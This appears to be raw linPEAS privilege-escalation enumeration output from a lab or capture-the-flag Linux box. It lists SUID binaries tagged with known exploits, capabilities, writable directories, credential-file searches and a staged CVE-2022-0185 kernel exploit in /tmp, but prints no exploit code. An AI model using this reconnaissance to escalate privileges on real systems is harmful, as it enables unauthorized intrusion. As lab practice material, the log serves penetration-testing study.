-rwsr-xr-x 1 root root 140K Nov 28 04:55 /usr/lib/snapd/snap-confine ---> Ubuntu_snapd<2.37_dirty_sock_Local_Privilege_Escalation(CVE-2019-7304)
-rwsr-xr-- 1 root messagebus 51K Oct 25 13:09 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 463K Mar 30 2022 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 23K Feb 21 2022 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 15K Jul 8 2019 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 39K Feb 7 2022 /usr/bin/umount ---> BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 39K Mar 7 2020 /usr/bin/fusermount
-rwsr-xr-x 1 root root 55K Feb 7 2022 /usr/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 67K Feb 7 2022 /usr/bin/su
-rwsr-xr-x 1 root root 44K Nov 29 11:53 /usr/bin/newgrp ---> HP-UX_10.20
-rwsr-xr-x 1 root root 84K Nov 29 11:53 /usr/bin/chfn ---> SuSE_9.3/10
-rwsr-xr-x 1 root root 163K Jan 19 2021 /usr/bin/sudo ---> check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x 1 root root 67K Nov 29 11:53 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 87K Nov 29 11:53 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 52K Nov 29 11:53 /usr/bin/chsh
-rwsr-sr-x 1 daemon daemon 55K Nov 12 2018 /usr/bin/at ---> RTru64_UNIX_4.0g(CVE-2002-1614)
-rwsr-xr-x 1 root root 121K Nov 25 17:29 /snap/snapd/17883/usr/lib/snapd/snap-confine ---> Ubuntu_snapd<2.37_dirty_sock_Local_Privilege_Escalation(CVE-2019-7304)
-rwsr-xr-x 1 root root 84K Mar 14 2022 /snap/core20/1695/usr/bin/chfn ---> SuSE_9.3/10
-rwsr-xr-x 1 root root 52K Mar 14 2022 /snap/core20/1695/usr/bin/chsh
-rwsr-xr-x 1 root root 87K Mar 14 2022 /snap/core20/1695/usr/bin/gpasswd
-rwsr-xr-x 1 root root 55K Feb 7 2022 /snap/core20/1695/usr/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 44K Mar 14 2022 /snap/core20/1695/usr/bin/newgrp ---> HP-UX_10.20
-rwsr-xr-x 1 root root 67K Mar 14 2022 /snap/core20/1695/usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 67K Feb 7 2022 /snap/core20/1695/usr/bin/su
-rwsr-xr-x 1 root root 163K Jan 19 2021 /snap/core20/1695/usr/bin/sudo ---> check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x 1 root root 39K Feb 7 2022 /snap/core20/1695/usr/bin/umount ---> BSD/Linux(08-1996)
-rwsr-xr-- 1 root systemd-resolve 51K Oct 25 13:09 /snap/core20/1695/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 463K Mar 30 2022 /snap/core20/1695/usr/lib/openssh/ssh-keysign
╔══════════╣ SGID
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
-rwxr-sr-x 1 root utmp 15K Sep 30 2019 /usr/lib/x86_64-linux-gnu/utempter/utempter
-rwxr-sr-x 1 root shadow 31K Nov 29 11:53 /usr/bin/expiry
-rwxr-sr-x 1 root crontab 43K Feb 13 2020 /usr/bin/crontab
-rwxr-sr-x 1 root tty 15K Mar 30 2020 /usr/bin/bsd-write
-rwxr-sr-x 1 root ssh 343K Mar 30 2022 /usr/bin/ssh-agent
-rwxr-sr-x 1 root shadow 83K Nov 29 11:53 /usr/bin/chage
-rwxr-sr-x 1 root tty 35K Feb 7 2022 /usr/bin/wall
-rwsr-sr-x 1 daemon daemon 55K Nov 12 2018 /usr/bin/at ---> RTru64_UNIX_4.0g(CVE-2002-1614)
-rwxr-sr-x 1 root shadow 43K Sep 17 2021 /usr/sbin/pam_extrausers_chkpwd
-rwxr-sr-x 1 root shadow 43K Sep 17 2021 /usr/sbin/unix_chkpwd
-rwxr-sr-x 1 root shadow 83K Mar 14 2022 /snap/core20/1695/usr/bin/chage
-rwxr-sr-x 1 root shadow 31K Mar 14 2022 /snap/core20/1695/usr/bin/expiry
-rwxr-sr-x 1 root crontab 343K Mar 30 2022 /snap/core20/1695/usr/bin/ssh-agent
-rwxr-sr-x 1 root tty 35K Feb 7 2022 /snap/core20/1695/usr/bin/wall
-rwxr-sr-x 1 root shadow 43K Sep 17 2021 /snap/core20/1695/usr/sbin/pam_extrausers_chkpwd
-rwxr-sr-x 1 root shadow 43K Sep 17 2021 /snap/core20/1695/usr/sbin/unix_chkpwd
╔══════════╣ Checking misconfigurations of ld.so
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#ld-so
/etc/ld.so.conf
include /etc/ld.so.conf.d/*.conf
/etc/ld.so.conf.d
/etc/ld.so.conf.d/fakeroot-x86_64-linux-gnu.conf
/usr/lib/x86_64-linux-gnu/libfakeroot
/etc/ld.so.conf.d/libc.conf
/usr/local/lib
/etc/ld.so.conf.d/x86_64-linux-gnu.conf
/usr/local/lib/x86_64-linux-gnu
/lib/x86_64-linux-gnu
/usr/lib/x86_64-linux-gnu
╔══════════╣ Capabilities
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities
Current env capabilities:
Current: =
Current proc capabilities:
CapInh: 0000000000000000
CapPrm: 0000000000000000
CapEff: 0000000000000000
CapBnd: 0000003fffffffff
CapAmb: 0000000000000000
Parent Shell capabilities:
0x0000000000000000=
Files with capabilities (limited to 50):
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/ping = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/snap/core20/1695/usr/bin/ping = cap_net_raw+ep
╔══════════╣ Users with capabilities
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities
╔══════════╣ AppArmor binary profiles
-rw-r--r-- 1 root root 3461 Jun 21 2022 sbin.dhclient
-rw-r--r-- 1 root root 3202 Feb 25 2020 usr.bin.man
-rw-r--r-- 1 root root 28486 Nov 28 04:55 usr.lib.snapd.snap-confine.real
-rw-r--r-- 1 root root 2006 Oct 19 11:35 usr.sbin.mysqld
-rw-r--r-- 1 root root 1575 Feb 11 2020 usr.sbin.rsyslogd
-rw-r--r-- 1 root root 1385 Dec 7 2019 usr.sbin.tcpdump
╔══════════╣ Files with ACLs (limited to 50)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#acls
files with acls in searched folders Not Found
╔══════════╣ .sh files in path
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#script-binaries-in-path
/usr/bin/rescan-scsi-bus.sh
/usr/bin/gettext.sh
╔══════════╣ Executable files potentially added by user (limit 70)
2022-11-17+09:09:15.5479107120 /usr/local/bin/doasedit
2022-11-17+09:09:15.5439087120 /usr/local/bin/vidoas
2022-11-17+09:09:15.5399067120 /usr/local/bin/doas
2022-11-15+21:42:19.3514476930 /etc/grub.d/01_track_initrdless_boot_fallback
2022-11-15+21:40:43.9906230840 /etc/console-setup/cached_setup_terminal.sh
2022-11-15+21:40:43.9906230840 /etc/console-setup/cached_setup_keyboard.sh
2022-11-15+21:40:43.9906230840 /etc/console-setup/cached_setup_font.sh
╔══════════╣ Unexpected in root
/data
/vagrant
╔══════════╣ Files (scripts) in /etc/profile.d/
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#profiles-files
total 36
drwxr-xr-x 2 root root 4096 Dec 1 18:14 .
drwxr-xr-x 101 root root 4096 Dec 13 07:44 ..
-rw-r--r-- 1 root root 96 Dec 5 2019 01-locale-fix.sh
-rw-r--r-- 1 root root 1557 Feb 17 2020 Z97-byobu.sh
-rw-r--r-- 1 root root 835 Oct 17 16:25 apps-bin-path.sh
-rw-r--r-- 1 root root 729 Feb 2 2020 bash_completion.sh
-rw-r--r-- 1 root root 1003 Aug 13 2019 cedilla-portuguese.sh
-rw-r--r-- 1 root root 1107 Nov 3 2019 gawk.csh
-rw-r--r-- 1 root root 757 Nov 3 2019 gawk.sh
╔══════════╣ Permissions in init, init.d, systemd, and rc.d
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#init-init-d-systemd-and-rc-d
═╣ Hashes inside passwd file? ........... No
═╣ Writable passwd file? ................ No
═╣ Credentials in fstab/mtab? ........... No
═╣ Can I read shadow files? ............. No
═╣ Can I read shadow plists? ............ No
═╣ Can I write shadow plists? ........... No
═╣ Can I read opasswd file? ............. No
═╣ Can I write in network-scripts? ...... No
═╣ Can I read root folder? .............. No
╔══════════╣ Searching root files in home dirs (limit 30)
/home/
/home/player/.viminfo
/home/player/user.txt
/home/player/.bash_history
/root/
/var/www
/var/www/html
/var/www/html/ground1.jpg
/var/www/html/ground4.jpg
/var/www/html/football.jpg
/var/www/html/ground3.jpg
/var/www/html/index.html
/var/www/html/tiny
/var/www/html/tiny/tinyfilemanager.php
/var/www/html/tiny/uploads
/var/www/html/ground2.jpg
╔══════════╣ Searching folders owned by me containing others files on it (limit 100)
/home/player
/sys/fs/cgroup/systemd/user.slice/user-1001.slice/[email protected]
/sys/fs/cgroup/unified/user.slice/user-1001.slice/[email protected]
╔══════════╣ Readable files belonging to root and readable by me but not world readable
-rw-r----- 1 root player 33 Mar 18 11:05 /home/player/user.txt
╔══════════╣ Modified interesting files in the last 5mins (limit 100)
/var/log/auth.log
/var/log/syslog
/var/log/journal/54adfd95645d49d9a102f16e9e98293b/system.journal
/var/log/journal/54adfd95645d49d9a102f16e9e98293b/user-1001.journal
╔══════════╣ Writable log files (logrotten) (limit 50)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#logrotate-exploitation
logrotate 3.14.0
Default mail command: /usr/bin/mail
Default compress command: /bin/gzip
Default uncompress command: /bin/gunzip
Default compress extension: .gz
Default state file path: /var/lib/logrotate/status
ACL support: yes
SELinux support: yes
╔══════════╣ Files inside /home/player (limit 20)
total 860
drwxr-xr-x 7 player player 4096 Mar 19 07:07 .
drwxr-xr-x 3 root root 4096 Nov 17 09:25 ..
lrwxrwxrwx 1 root root 9 Nov 17 09:02 .bash_history -> /dev/null
-rw-r--r-- 1 player player 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 player player 3771 Feb 25 2020 .bashrc
drwx------ 2 player player 4096 Nov 17 09:00 .cache
drwx------ 3 player player 4096 Mar 19 04:05 .config
drwx------ 3 player player 4096 Mar 19 07:08 .gnupg
-rw------- 1 player player 36 Mar 19 05:23 .lesshst
drwxrwxr-x 3 player player 4096 Mar 18 18:53 .local
-rw-r--r-- 1 player player 807 Feb 25 2020 .profile
lrwxrwxrwx 1 root root 9 Nov 17 09:02 .viminfo -> /dev/null
-rwxrwxr-x 1 player player 828172 Feb 26 04:31 linpeas.sh
drwx------ 3 player player 4096 Mar 19 03:52 snap
-rw-r----- 1 root player 33 Mar 18 11:05 user.txt
╔══════════╣ Files inside others home (limit 20)
/var/www/html/ground1.jpg
/var/www/html/ground4.jpg
/var/www/html/football.jpg
/var/www/html/ground3.jpg
/var/www/html/index.html
/var/www/html/tiny/tinyfilemanager.php
/var/www/html/ground2.jpg
╔══════════╣ Searching installed mail applications
╔══════════╣ Mails (limit 50)
╔══════════╣ Backup files (limited 100)
-rw-r--r-- 1 root root 7867 Jul 16 1996 /usr/share/doc/telnet/README.old.gz
-rw-r--r-- 1 root root 392817 Feb 9 2020 /usr/share/doc/manpages/Changes.old.gz
-rw-r--r-- 1 root root 11886 Nov 17 09:07 /usr/share/info/dir.old
-rw-r--r-- 1 root root 2756 Feb 13 2020 /usr/share/man/man8/vgcfgbackup.8.gz
-rwxr-xr-x 1 root root 226 Feb 17 2020 /usr/share/byobu/desktop/byobu.desktop.old
-rw-r--r-- 1 root root 44048 Aug 16 2022 /usr/lib/x86_64-linux-gnu/open-vm-tools/plugins/vmsvc/libvmbackup.so
-rw-r--r-- 1 root root 1802 Aug 15 2022 /usr/lib/python3/dist-packages/sos/report/plugins/ovirt_engine_backup.py
-rw-r--r-- 1 root root 1413 Nov 15 21:40 /usr/lib/python3/dist-packages/sos/report/plugins/__pycache__/ovirt_engine_backup.cpython-38.pyc
-rw-r--r-- 1 root root 39448 Nov 15 20:42 /usr/lib/mysql/plugin/component_mysqlbackup.so
-rwxr-xr-x 1 root root 1086 Nov 25 2019 /usr/src/linux-headers-5.4.0-135/tools/testing/selftests/net/tcp_fastopen_backup_key.sh
-rw-r--r-- 1 root root 237863 Nov 23 19:51 /usr/src/linux-headers-5.4.0-135-generic/.config.old
-rw-r--r-- 1 root root 0 Nov 23 19:51 /usr/src/linux-headers-5.4.0-135-generic/include/config/net/team/mode/activebackup.h
-rw-r--r-- 1 root root 0 Nov 23 19:51 /usr/src/linux-headers-5.4.0-135-generic/include/config/wm831x/backup.h
╔══════════╣ Searching tables inside readable .db/.sql/.sqlite files (limit 100)
Found /var/lib/PackageKit/transactions.db: SQLite 3.x database, last written using SQLite version 3031001
Found /var/lib/command-not-found/commands.db: SQLite 3.x database, last written using SQLite version 3031001
Found /var/lib/fwupd/pending.db: SQLite 3.x database, last written using SQLite version 3031001
-> Extracting tables from /var/lib/PackageKit/transactions.db (limit 20)
-> Extracting tables from /var/lib/command-not-found/commands.db (limit 20)
-> Extracting tables from /var/lib/fwupd/pending.db (limit 20)
╔══════════╣ Web files?(output limit)
/var/www/:
total 12K
drwxr-xr-x 3 root root 4.0K Nov 17 08:06 .
drwxr-xr-x 14 root root 4.0K Nov 17 08:06 ..
drwxr-xr-x 3 root root 4.0K Nov 17 08:20 html
/var/www/html:
total 1.1M
drwxr-xr-x 3 root root 4.0K Nov 17 08:20 .
drwxr-xr-x 3 root root 4.0K Nov 17 08:06 ..
╔══════════╣ All hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)
-rw------- 1 root root 0 Mar 18 11:05 /run/snapd/lock/.lock
-rw-r--r-- 1 root root 0 Mar 18 11:05 /run/network/.ifstate.lock
-rw-r--r-- 1 root root 121 Nov 3 11:37 /usr/lib/node_modules/npm/node_modules/node-gyp/gyp/.flake8
-rw-r--r-- 1 root root 38 Oct 14 2021 /usr/lib/node_modules/npm/node_modules/qrcode-terminal/.travis.yml
-rw-r--r-- 1 root root 0 Oct 14 2021 /usr/lib/node_modules/npm/.npmrc
-rw-r--r-- 1 root root 119 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/continuation-local-storage/.travis.yml
-rw-r--r-- 1 root root 422 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/continuation-local-storage/.eslintrc
-rw-r--r-- 1 root root 78 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/dayjs/.editorconfig
-rw-r--r-- 1 root root 605 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/resolve/.editorconfig
-rw-r--r-- 1 root root 1687 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/resolve/.eslintrc
-rw-r--r-- 1 root root 52 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/deep-is/.travis.yml
-rw-r--r-- 1 root root 71 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/shimmer/.travis.yml
-rw-r--r-- 1 root root 71 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/emitter-listener/.travis.yml
-rw-r--r-- 1 root root 63 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/pm2-axon-rpc/.travis.yml
-rw-r--r-- 1 root root 144 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/yamljs/.travis.yml
-rw-r--r-- 1 root root 207 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/socks/.eslintrc.cjs
-rw-r--r-- 1 root root 124 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/socks/.prettierrc.yaml
-rw-r--r-- 1 root root 230 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/fclone/.travis.yml
-rw-r--r-- 1 root root 139 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/is-core-module/.nycrc
-rw-r--r-- 1 root root 339 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/is-core-module/.eslintrc
-rw-r--r-- 1 root root 107 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/vizion/.travis.yml
-rw-r--r-- 1 root root 63 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/module-details-from-path/.travis.yml
-rw-r--r-- 1 root root 33 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/vm2/.eslintignore
-rw-r--r-- 1 root root 213 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/vm2/.eslintrc.js
-rw-r--r-- 1 root root 242 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/estraverse/.jshintrc
-rw-r--r-- 1 root root 152 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/smart-buffer/.travis.yml
-rw-r--r-- 1 root root 84 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/smart-buffer/.prettierrc.yaml
-rw-r--r-- 1 root root 1168 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/promptly/.jshintrc
-rw-r--r-- 1 root root 220 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/promptly/.editorconfig
-rw-r--r-- 1 root root 62 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/promptly/.travis.yml
-rw-r--r-- 1 root root 2343 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/@pm2/io/.drone.jsonnet
-rw-r--r-- 1 root root 280 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/@pm2/io/.mocharc.js
-rw-r--r-- 1 root root 2095 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/@pm2/js-api/.drone.jsonnet
-rw-r--r-- 1 root root 78 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/@pm2/agent/node_modules/dayjs/.editorconfig
-rw-r--r-- 1 root root 2745 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/@pm2/agent/.drone.jsonnet
-rw-r--r-- 1 root root 244 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/@pm2/agent/.mocharc.yml
-rw-r--r-- 1 root root 219 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/async-listener/.travis.yml
-rw-r--r-- 1 root root 139 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/supports-preserve-symlinks-flag/.nycrc
-rw-r--r-- 1 root root 132 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/supports-preserve-symlinks-flag/.eslintrc
-rw-r--r-- 1 root root 43 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/concat-map/.travis.yml
-rw-r--r-- 1 root root 50 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/log-driver/.travis.yml
-rw-r--r-- 1 root root 125 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/tx2/.travis.yml
-rw-r--r-- 1 root root 286 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/function-bind/.editorconfig
-rw-r--r-- 1 root root 4140 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/function-bind/.jscs.json
-rw-r--r-- 1 root root 5451 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/function-bind/.travis.yml
-rw-r--r-- 1 root root 176 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/function-bind/test/.eslintrc
-rw-r--r-- 1 root root 231 Nov 17 08:07 /usr/lib/node_modules/pm2/node_modules/function-bind/.eslintrc
-rw-r--r-- 1 root root 357 Nov 17 08:07 /usr/lib/node_modules/pm2/.travis.yml
-rw-r--r-- 1 root root 216 Nov 17 08:07 /usr/lib/node_modules/pm2/.mocharc.js
-rw-r--r-- 1 landscape landscape 0 Nov 15 21:40 /var/lib/landscape/.cleanup.user
-rw------- 1 root root 0 Nov 15 21:38 /etc/.pwd.lock
-rw-r--r-- 1 root root 220 Feb 25 2020 /etc/skel/.bash_logout
-rw-r--r-- 1 player player 220 Feb 25 2020 /home/player/.bash_logout
-rw------- 1 root root 0 Oct 27 04:34 /snap/core20/1695/etc/.pwd.lock
-rw-r--r-- 1 root root 220 Feb 25 2020 /snap/core20/1695/etc/skel/.bash_logout
╔══════════╣ Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)
-rwxrwxrwx 1 www-data www-data 700144 Mar 18 11:45 /tmp/exploit
-rwxrwxr-x 1 player player 765818 Mar 18 10:45 /tmp/linpeas.sh
-rw-rw-r-- 1 player player 166722 Mar 19 04:01 /tmp/peas_result
-rw-rw-rw- 1 www-data www-data 2590720 Mar 18 11:44 /tmp/dist.tar
-rw-r--r-- 1 www-data www-data 1329 Mar 18 11:42 /tmp/CVE-2022-0185/util.c
-rw-r--r-- 1 www-data www-data 7671 Mar 18 11:42 /tmp/CVE-2022-0185/exploit_fuse.c
-rw-r--r-- 1 www-data www-data 17624 Mar 18 11:42 /tmp/CVE-2022-0185/exploit_kctf.c
-rw-r--r-- 1 www-data www-data 1375 Mar 18 11:42 /tmp/CVE-2022-0185/util.h
-rw-r--r-- 1 www-data www-data 1648 Mar 18 11:42 /tmp/CVE-2022-0185/fakefuse.c
-rw-r--r-- 1 www-data www-data 67802 Mar 18 11:42 /tmp/CVE-2022-0185/libfuse/fuse_lowlevel.h
-rw-r--r-- 1 www-data www-data 18939 Mar 18 11:42 /tmp/CVE-2022-0185/libfuse/fuse_kernel.h
-rw-r--r-- 1 www-data www-data 45131 Mar 18 11:42 /tmp/CVE-2022-0185/libfuse/fuse.h
-rw-r--r-- 1 www-data www-data 27245 Mar 18 11:42 /tmp/CVE-2022-0185/libfuse/fuse_common.h
-rw-r--r-- 1 www-data www-data 1968 Mar 18 11:42 /tmp/CVE-2022-0185/libfuse/fuse_log.h
-rw-r--r-- 1 www-data www-data 7549 Mar 18 11:42 /tmp/CVE-2022-0185/libfuse/fuse_opt.h
-rw-r--r-- 1 www-data www-data 178 Mar 18 11:42 /tmp/CVE-2022-0185/libfuse/meson.build
-rw-r--r-- 1 www-data www-data 2573 Mar 18 11:42 /tmp/CVE-2022-0185/libfuse/cuse_lowlevel.h
-rw-r--r-- 1 www-data www-data 623 Mar 18 11:42 /tmp/CVE-2022-0185/fakefuse.h
-rw-r--r-- 1 www-data www-data 228 Mar 18 11:42 /tmp/CVE-2022-0185/Makefile
-rw-r--r-- 1 www-data www-data 1798260 Mar 18 11:42 /tmp/CVE-2022-0185/libfuse3.a
-rw-r--r-- 1 www-data www-data 73 Mar 18 11:42 /tmp/CVE-2022-0185/.git/description
-rw-r--r-- 1 www-data www-data 23 Mar 18 11:42 /tmp/CVE-2022-0185/.git/HEAD
-rw-r--r-- 1 www-data www-data 1482 Mar 18 11:42 /tmp/CVE-2022-0185/.git/index
-rw-r--r-- 1 www-data www-data 114 Mar 18 11:42 /tmp/CVE-2022-0185/.git/packed-refs
-rw-r--r-- 1 www-data www-data 279 Mar 18 11:42 /tmp/CVE-2022-0185/.git/config
-r--r--r-- 1 www-data www-data 510232 Mar 18 11:42 /tmp/CVE-2022-0185/.git/objects/pack/pack-0dab61f937873259ecf5d2eb543ff85605da5af1.pack
-r--r--r-- 1 www-data www-data 1716 Mar 18 11:42 /tmp/CVE-2022-0185/.git/objects/pack/pack-0dab61f937873259ecf5d2eb543ff85605da5af1.idx
-rw-r--r-- 1 www-data www-data 240 Mar 18 11:42 /tmp/CVE-2022-0185/.git/info/exclude
-rw-r--r-- 1 www-data www-data 198 Mar 18 11:42 /tmp/CVE-2022-0185/.git/logs/HEAD
-rw-r--r-- 1 www-data www-data 198 Mar 18 11:42 /tmp/CVE-2022-0185/.git/logs/refs/heads/master
-rw-r--r-- 1 www-data www-data 198 Mar 18 11:42 /tmp/CVE-2022-0185/.git/logs/refs/remotes/origin/HEAD
-rwxr-xr-x 1 www-data www-data 896 Mar 18 11:42 /tmp/CVE-2022-0185/.git/hooks/commit-msg.sample
-rwxr-xr-x 1 www-data www-data 4898 Mar 18 11:42 /tmp/CVE-2022-0185/.git/hooks/pre-rebase.sample
-rwxr-xr-x 1 www-data www-data 1492 Mar 18 11:42 /tmp/CVE-2022-0185/.git/hooks/prepare-commit-msg.sample
-rwxr-xr-x 1 www-data www-data 416 Mar 18 11:42 /tmp/CVE-2022-0185/.git/hooks/pre-merge-commit.sample
-rwxr-xr-x 1 www-data www-data 544 Mar 18 11:42 /tmp/CVE-2022-0185/.git/hooks/pre-receive.sample
-rwxr-xr-x 1 www-data www-data 4726 Mar 18 11:42 /tmp/CVE-2022-0185/.git/hooks/fsmonitor-watchman.sample
-rwxr-xr-x 1 www-data www-data 2783 Mar 18 11:42 /tmp/CVE-2022-0185/.git/hooks/push-to-checkout.sample
-rwxr-xr-x 1 www-data www-data 189 Mar 18 11:42 /tmp/CVE-2022-0185/.git/hooks/post-update.sample
-rwxr-xr-x 1 www-data www-data 424 Mar 18 11:42 /tmp/CVE-2022-0185/.git/hooks/pre-applypatch.sample
-rwxr-xr-x 1 www-data www-data 1643 Mar 18 11:42 /tmp/CVE-2022-0185/.git/hooks/pre-commit.sample
-rwxr-xr-x 1 www-data www-data 478 Mar 18 11:42 /tmp/CVE-2022-0185/.git/hooks/applypatch-msg.sample
-rwxr-xr-x 1 www-data www-data 1374 Mar 18 11:42 /tmp/CVE-2022-0185/.git/hooks/pre-push.sample
-rwxr-xr-x 1 www-data www-data 3650 Mar 18 11:42 /tmp/CVE-2022-0185/.git/hooks/update.sample
-rw-r--r-- 1 www-data www-data 41 Mar 18 11:42 /tmp/CVE-2022-0185/.git/refs/heads/master
-rw-r--r-- 1 www-data www-data 32 Mar 18 11:42 /tmp/CVE-2022-0185/.git/refs/remotes/origin/HEAD
-rw-r--r-- 1 www-data www-data 1241 Mar 18 11:42 /tmp/CVE-2022-0185/README.md
-rw-r--r-- 1 root root 4085 Dec 1 19:02 /var/backups/apt.extended_states.1.gz
-rw-r--r-- 1 root root 172 Nov 17 08:51 /var/backups/dpkg.statoverride.0
-rw-r--r-- 1 root root 682236 Dec 13 07:46 /var/backups/dpkg.status.0
-rw-r--r-- 1 root root 268 Nov 15 21:42 /var/backups/dpkg.diversions.0
-rw-r--r-- 1 root root 4039 Dec 1 13:33 /var/backups/apt.extended_states.2.gz
-rw-r--r-- 1 root root 36981 Dec 13 07:46 /var/backups/apt.extended_states.0
-rw-r--r-- 1 root root 61440 Mar 19 06:25 /var/backups/alternatives.tar.0
-rw-r--r-- 1 root root 4062 Nov 22 16:36 /var/backups/apt.extended_states.3.gz
╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files
/dev/mqueue
/dev/shm
/home/player
/run/lock
/run/screen
/run/user/1001
/run/user/1001/dbus-1
/run/user/1001/dbus-1/services
/run/user/1001/gnupg
/run/user/1001/inaccessible
/run/user/1001/systemd
/run/user/1001/systemd/transient
/run/user/1001/systemd/units
/snap/core20/1695/run/lock
/snap/core20/1695/tmp
/snap/core20/1695/var/tmp
/tmp
/tmp/.ICE-unix
/tmp/.Test-unix
/tmp/.X11-unix
/tmp/.XIM-unix
/tmp/.font-unix
#)You_can_write_even_more_files_inside_last_directory
/var/crash
/var/lib/php/sessions
/var/tmp
/var/tmp/cloud-init
/var/www/html/tiny/uploads
╔══════════╣ Interesting GROUP writable files (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files
Group player:
/usr/local/share/dstat
/tmp/linpeas.sh
/tmp/peas_result
╔══════════╣ Searching passwords in history files
╔══════════╣ Searching *password* or *credential* files in home (limit 70)
/etc/pam.d/common-password
/usr/bin/systemd-ask-password
/usr/bin/systemd-tty-ask-password-agent
/usr/lib/git-core/git-credential
/usr/lib/git-core/git-credential-cache
/usr/lib/git-core/git-credential-cache--daemon
/usr/lib/git-core/git-credential-store
#)There are more creds/passwds files in the previous parent folder
/usr/lib/grub/i386-pc/password.mod
/usr/lib/grub/i386-pc/password_pbkdf2.mod
/usr/lib/mysql/plugin/component_validate_password.so
/usr/lib/mysql/plugin/validate_password.so
/usr/lib/node_modules/pm2/node_modules/enquirer/lib/prompts/password.js
/usr/lib/node_modules/pm2/node_modules/proxy-agent/test/ssl-cert-snakeoil.key
/usr/lib/python3/dist-packages/keyring/__pycache__/credentials.cpython-38.pyc
/usr/lib/python3/dist-packages/keyring/credentials.py
/usr/lib/python3/dist-packages/launchpadlib/__pycache__/credentials.cpython-38.pyc
/usr/lib/python3/dist-packages/launchpadlib/credentials.py
/usr/lib/python3/dist-packages/launchpadlib/tests/__pycache__/test_credential_store.cpython-38.pyc
/usr/lib/python3/dist-packages/launchpadlib/tests/test_credential_store.py
/usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/client_credentials.cpython-38.pyc
/usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/resource_owner_password_credentials.cpython-38.pyc
/usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/client_credentials.py
